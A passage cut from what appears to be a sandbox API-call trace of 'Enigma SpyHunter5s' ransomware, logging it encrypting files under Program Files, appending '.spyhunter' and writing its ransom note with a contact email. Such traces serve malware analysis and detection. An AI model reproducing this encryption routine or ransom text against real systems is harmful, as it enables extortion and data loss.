(HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.998] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f9e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f9e8*=0x30) returned 1 [0113.998] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\settings.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\settings.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.031] GetProcessHeap () returned 0x2c0000 [0114.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.031] GetProcessHeap () returned 0x2c0000 [0114.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e40dd8 | out: hHeap=0x2c0000) returned 1 [0114.032] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f9f0 | out: pbBuffer=0x248f9f0) returned 1 [0114.032] GetProcessHeap () returned 0x2c0000 [0114.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.032] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f9e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f9e8*=0x30) returned 1 [0114.032] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.032] GetProcessHeap () returned 0x2c0000 [0114.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.032] GetProcessHeap () returned 0x2c0000 [0114.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d388 | out: hHeap=0x2c0000) returned 1 [0114.032] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f9e8 | out: pbBuffer=0x248f9e8) returned 1 [0114.032] GetProcessHeap () returned 0x2c0000 [0114.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.032] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f9e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f9e0*=0x30) returned 1 [0114.032] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\." (normalized: "c:\\program files (x86)\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.033] GetProcessHeap () returned 0x2c0000 [0114.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.033] GetProcessHeap () returned 0x2c0000 [0114.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x379218 | out: hHeap=0x2c0000) returned 1 [0114.034] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0114.034] WriteFile (in: hFile=0xf0, lpBuffer=0x248f91b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fa44, lpOverlapped=0x0 | out: lpBuffer=0x248f91b*, lpNumberOfBytesWritten=0x248fa44*=0x127, lpOverlapped=0x0) returned 1 [0114.035] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0114.035] WriteFile (in: hFile=0xf0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fa44, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fa44*=0x2ac, lpOverlapped=0x0) returned 1 [0114.035] CloseHandle (hObject=0xf0) returned 1 [0114.035] GetProcessHeap () returned 0x2c0000 [0114.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bee8 | out: hHeap=0x2c0000) returned 1 [0114.037] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f9e0 | out: pbBuffer=0x248f9e0) returned 1 [0114.037] GetProcessHeap () returned 0x2c0000 [0114.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.037] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f9d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f9d8*=0x30) returned 1 [0114.037] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\wlsrvc.dll" (normalized: "c:\\program files\\windows sidebar\\wlsrvc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.037] GetProcessHeap () returned 0x2c0000 [0114.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.037] GetProcessHeap () returned 0x2c0000 [0114.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d9d8 | out: hHeap=0x2c0000) returned 1 [0114.037] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f9d8 | out: pbBuffer=0x248f9d8) returned 1 [0114.038] GetProcessHeap () returned 0x2c0000 [0114.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.038] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f9d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f9d0*=0x30) returned 1 [0114.038] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\substantial.exe" (normalized: "c:\\program files\\windows sidebar\\substantial.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.038] GetProcessHeap () returned 0x2c0000 [0114.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.038] GetProcessHeap () returned 0x2c0000 [0114.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b870 | out: hHeap=0x2c0000) returned 1 [0114.038] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f9d8 | out: pbBuffer=0x248f9d8) returned 1 [0114.038] GetProcessHeap () returned 0x2c0000 [0114.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.038] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f9d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f9d0*=0x30) returned 1 [0114.038] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\sidebar.exe" (normalized: "c:\\program files\\windows sidebar\\sidebar.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.038] GetProcessHeap () returned 0x2c0000 [0114.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.040] GetProcessHeap () returned 0x2c0000 [0114.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c204f0 | out: hHeap=0x2c0000) returned 1 [0114.051] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f9d0 | out: pbBuffer=0x248f9d0) returned 1 [0114.051] GetProcessHeap () returned 0x2c0000 [0114.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.051] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f9c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f9c8*=0x30) returned 1 [0114.051] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\settings.ini" (normalized: "c:\\program files\\windows sidebar\\settings.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0114.052] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\settings.ini") returned 49 [0114.052] StrStrW (lpFirst="settings.ini", lpSrch=".txt") returned 0x0 [0114.052] GetProcessHeap () returned 0x2c0000 [0114.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0114.052] ReadFile (in: hFile=0xf0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f98c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f98c*=0x50, lpOverlapped=0x0) returned 1 [0114.053] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffffb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.053] WriteFile (in: hFile=0xf0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x248f98c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f98c*=0x50, lpOverlapped=0x0) returned 1 [0114.053] GetProcessHeap () returned 0x2c0000 [0114.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0114.053] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.054] WriteFile (in: hFile=0xf0, lpBuffer=0x248f9cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f98c, lpOverlapped=0x0 | out: lpBuffer=0x248f9cc*, lpNumberOfBytesWritten=0x248f98c*=0x4, lpOverlapped=0x0) returned 1 [0114.054] WriteFile (in: hFile=0xf0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f98c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f98c*=0x30, lpOverlapped=0x0) returned 1 [0114.054] CloseHandle (hObject=0xf0) returned 1 [0114.054] GetProcessHeap () returned 0x2c0000 [0114.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c7e1b0 [0114.055] wnsprintfW (in: pszDest=0x2c7e1b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Windows Sidebar\\settings.ini.spyhunter") returned 59 [0114.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\settings.ini" (normalized: "c:\\program files\\windows sidebar\\settings.ini"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\settings.ini.spyhunter" (normalized: "c:\\program files\\windows sidebar\\settings.ini.spyhunter")) returned 1 [0114.056] GetProcessHeap () returned 0x2c0000 [0114.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e1b0 | out: hHeap=0x2c0000) returned 1 [0114.057] GetProcessHeap () returned 0x2c0000 [0114.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.057] GetProcessHeap () returned 0x2c0000 [0114.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20650 | out: hHeap=0x2c0000) returned 1 [0114.057] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f9c8 | out: pbBuffer=0x248f9c8) returned 1 [0114.057] GetProcessHeap () returned 0x2c0000 [0114.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.057] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f9c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f9c0*=0x30) returned 1 [0114.057] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\sbdrop.dll" (normalized: "c:\\program files\\windows sidebar\\sbdrop.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.068] GetProcessHeap () returned 0x2c0000 [0114.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.068] GetProcessHeap () returned 0x2c0000 [0114.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d888 | out: hHeap=0x2c0000) returned 1 [0114.069] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f9c8 | out: pbBuffer=0x248f9c8) returned 1 [0114.069] GetProcessHeap () returned 0x2c0000 [0114.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.069] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f9c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f9c0*=0x30) returned 1 [0114.069] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_thunderstorm.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_thunderstorm.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.090] GetProcessHeap () returned 0x2c0000 [0114.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.090] GetProcessHeap () returned 0x2c0000 [0114.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3cb18 | out: hHeap=0x2c0000) returned 1 [0114.090] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f9c0 | out: pbBuffer=0x248f9c0) returned 1 [0114.090] GetProcessHeap () returned 0x2c0000 [0114.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.090] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f9b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f9b8*=0x30) returned 1 [0114.091] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_foggy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_foggy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.097] GetProcessHeap () returned 0x2c0000 [0114.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.097] GetProcessHeap () returned 0x2c0000 [0114.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e53060 | out: hHeap=0x2c0000) returned 1 [0114.097] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f9c0 | out: pbBuffer=0x248f9c0) returned 1 [0114.097] GetProcessHeap () returned 0x2c0000 [0114.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.097] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f9b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f9b8*=0x30) returned 1 [0114.098] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.105] GetProcessHeap () returned 0x2c0000 [0114.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.105] GetProcessHeap () returned 0x2c0000 [0114.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e52f60 | out: hHeap=0x2c0000) returned 1 [0114.106] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f9b8 | out: pbBuffer=0x248f9b8) returned 1 [0114.106] GetProcessHeap () returned 0x2c0000 [0114.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.106] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f9b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f9b0*=0x30) returned 1 [0114.111] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_sun.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_sun.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.118] GetProcessHeap () returned 0x2c0000 [0114.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.118] GetProcessHeap () returned 0x2c0000 [0114.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e52d60 | out: hHeap=0x2c0000) returned 1 [0114.119] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f9b8 | out: pbBuffer=0x248f9b8) returned 1 [0114.119] GetProcessHeap () returned 0x2c0000 [0114.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.119] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f9b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f9b0*=0x30) returned 1 [0114.119] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ahclient.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ahclient.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0114.144] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ahclient.dll") returned 64 [0114.144] StrStrW (lpFirst="ahclient.dll", lpSrch=".txt") returned 0x0 [0114.144] GetProcessHeap () returned 0x2c0000 [0114.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0114.144] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f974, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f974*=0x2800, lpOverlapped=0x0) returned 1 [0114.161] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.161] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f974, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f974*=0x2800, lpOverlapped=0x0) returned 1 [0114.161] GetProcessHeap () returned 0x2c0000 [0114.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0114.161] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.161] WriteFile (in: hFile=0xb4, lpBuffer=0x248f9b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f974, lpOverlapped=0x0 | out: lpBuffer=0x248f9b4*, lpNumberOfBytesWritten=0x248f974*=0x4, lpOverlapped=0x0) returned 1 [0114.204] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f974, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f974*=0x30, lpOverlapped=0x0) returned 1 [0114.205] CloseHandle (hObject=0xb4) returned 1 [0114.205] GetProcessHeap () returned 0x2c0000 [0114.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e56ea8 [0114.205] wnsprintfW (in: pszDest=0x2e56ea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ahclient.dll.spyhunter") returned 74 [0114.205] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ahclient.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ahclient.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ahclient.dll.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ahclient.dll.spyhunter")) returned 1 [0114.206] GetProcessHeap () returned 0x2c0000 [0114.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e56ea8 | out: hHeap=0x2c0000) returned 1 [0114.206] GetProcessHeap () returned 0x2c0000 [0114.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.206] GetProcessHeap () returned 0x2c0000 [0114.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d03650 | out: hHeap=0x2c0000) returned 1 [0114.206] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f9b0 | out: pbBuffer=0x248f9b0) returned 1 [0114.206] GetProcessHeap () returned 0x2c0000 [0114.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.206] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f9a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f9a8*=0x30) returned 1 [0114.206] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40_full.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icudt40_full.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0114.207] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40_full.dll") returned 68 [0114.208] StrStrW (lpFirst="icudt40_full.dll", lpSrch=".txt") returned 0x0 [0114.208] GetProcessHeap () returned 0x2c0000 [0114.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0114.208] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f96c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f96c*=0x2800, lpOverlapped=0x0) returned 1 [0114.265] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.265] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f96c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f96c*=0x2800, lpOverlapped=0x0) returned 1 [0114.265] GetProcessHeap () returned 0x2c0000 [0114.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0114.265] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.265] WriteFile (in: hFile=0xb4, lpBuffer=0x248f9ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f96c, lpOverlapped=0x0 | out: lpBuffer=0x248f9ac*, lpNumberOfBytesWritten=0x248f96c*=0x4, lpOverlapped=0x0) returned 1 [0114.300] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f96c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f96c*=0x30, lpOverlapped=0x0) returned 1 [0114.300] CloseHandle (hObject=0xb4) returned 1 [0114.300] GetProcessHeap () returned 0x2c0000 [0114.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.300] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40_full.dll.spyhunter") returned 78 [0114.300] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40_full.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 